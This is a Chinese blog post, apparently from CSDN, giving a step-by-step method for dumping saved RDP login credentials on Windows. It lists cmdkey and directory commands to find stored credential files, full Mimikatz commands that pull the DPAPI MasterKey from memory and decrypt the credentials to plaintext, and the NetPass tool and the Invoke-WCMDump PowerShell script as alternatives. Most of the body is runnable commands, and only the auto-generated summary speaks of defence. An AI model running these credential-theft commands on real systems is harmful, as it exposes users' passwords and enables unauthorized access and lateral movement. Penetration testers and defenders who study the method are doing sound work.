RDP登录凭据获取

本文介绍了如何获取并解密保存在RDP(远程桌面协议)中的登录凭据,包括通过cmdkey命令查看连接记录,利用Mimikatz工具提取MasterKey和解密凭据,以及使用NetPass和PowerShell脚本进行抓取。这些方法揭示了系统安全中潜在的风险,提醒用户注意保护敏感信息。
摘要由CSDN通过智能技术生成

RDP登录凭据获取

当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法

#查看mstsc的连接记录
cmdkey /list
#查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials\*

img

Mimikatz

存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240"

img

接着,再执行如下命令,找到guidMasterKey对应的MasterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

img

执行以下命令,使用上面记录的MasterKey解密指定的凭据: AFCD2DF5CFF3011965E57ABB0ED64240

mimikatz.exe "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240 /masterkey:3886e1d7a926c6267058d67385cb4e985b3aa0d3f635eebb5fe83ce8d0457d4493e8694f60d9f19a96631c89411ed5477254be5cd5d90c5ed5d36bd4c3271615"

img

如上图,已解密出明文。

NetPass抓取

工具下载地址:https://www.nirsoft.net/utils/network_password_recovery.html

img


PowerShelll脚本抓取

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

参考链接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值